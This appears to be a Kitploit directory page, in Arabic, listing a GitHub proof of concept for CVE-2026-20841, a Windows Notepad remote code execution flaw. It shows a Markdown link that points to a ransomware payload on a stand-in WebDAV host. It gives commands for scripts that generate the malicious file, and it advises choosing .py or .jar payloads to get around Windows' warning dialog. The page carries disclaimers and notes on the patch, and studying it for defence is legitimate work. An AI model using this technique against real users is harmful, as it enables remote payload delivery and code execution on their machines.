Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-20841 — PoC لثغرة «Windows Notepad RCE» | Kitploit
أدوات/GitHubGitHub/tangent65536/cve-2026-20841
توليد الحمولةالاستغلالالتصيد الاحتيالي
GitHubtangent65536/cve-2026-20841

CVE-2026-20841

PoC لثغرة «Windows Notepad RCE»

عرض المستودع
21منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-20841 PoC

PoC لثغرة "Windows Notepad RCE".

إخلاء المسؤولية

  1. أنا لستُ مكتشف هذه الثغرة. يعود الفضل إلى المؤلفين الأصليين المدرجين في صفحة الإفصاح الرسمية. لقد أعدت فقط إنشاء الـ PoC وفقًا للوصف.
  2. شخصيًا، لا أعتقد أن هذه الثغرة بالخطورة التي قد تبدو عليها. يتطلب تشغيلها أكثر من نقرة واحدة، ما لم تتحقق معايير معينة على النظام المستهدف. يُرجى الاطلاع على قسم المعايير والقيود. أعدت إنشاء هذا الـ PoC لأنه يستحق أن يُتداول كميم. فـ"Notepad RCE" يبدو أمرًا جنونيًا للغاية.

الوصف

"الثغرة" بسيطة. محرك Markdown في Windows Notepad لا يبالي ببروتوكولات عناوين URL غير المألوفة. بوصفي محلل برمجيات خبيثة، قرأتُ تقارير عديدة عن نشر الحمولات عبر WebDAV وSMB. من خلال هذا المستند، يمكن إساءة استخدام بروتوكول file:/// وإنشاء عنوان URL يشير إلى ملف على خادم WebDAV/SMB.

root@kitploit:~
[BadLink](file:///\\webdav-payload-host@5005\DavWWWRoot\ransomware.py)

الاستخدام

لقد أعددت نصين برمجيين: أحدهما بلغة Node.js والآخر بلغة Python. كلاهما ينشئ ملف Markdown يشير إلى حمولة WebDAV. يمكنك استخدام الحمولات النموذجية في مجلد sample-payloads.

Node.js

node poc.js <webdav-server> <port> <payload/path/on/server>

Python

python poc.py <webdav-server> <port> <payload/path/on/server>

سيظهر الملف الناتج (poc.md) في الدليل الحالي.

المعايير والقيود

  1. معظم امتدادات ملفات الحمولة (مثل .exe و.lnk و.vbs، ...) ستظل تؤدي إلى ظهور تحذير مدمج على الرغم من أن تطبيق Notepad معرّض للثغرة. يأتي التحذير من Windows نفسه. على الأقل كل ما اختبرته مما يمكن أن يؤدي إلى تنفيذ تعليمات برمجية على تثبيت افتراضي خارج الصندوق (OOB) يُظهر هذا التحذير الإلزامي.
    fig01

  2. إذا كان الجهاز المستهدف يحتوي على Python أو Java مثبتًا، يمكنك استخدام حمولة بامتداد .py أو .jar لتجاوز نافذة التحذير المنبثقة.

بعد تطبيق التصحيح

fig02
النقر على الرابط الآن يعرض نافذة تحذير منبثقة جديدة.

متفرقات

يمكنك العثور على نسخة Windows Notepad المعرّضة للثغرة من Uptodown. تذكر التحقق من التوقيع الرقمي للمثبّت والتأكد من أنه من Microsoft. كما ينبغي اختبار هذا الـ PoC داخل جهاز افتراضي فقط.

ابقوا آمنين واستمتعوا!

تنزيل الأداة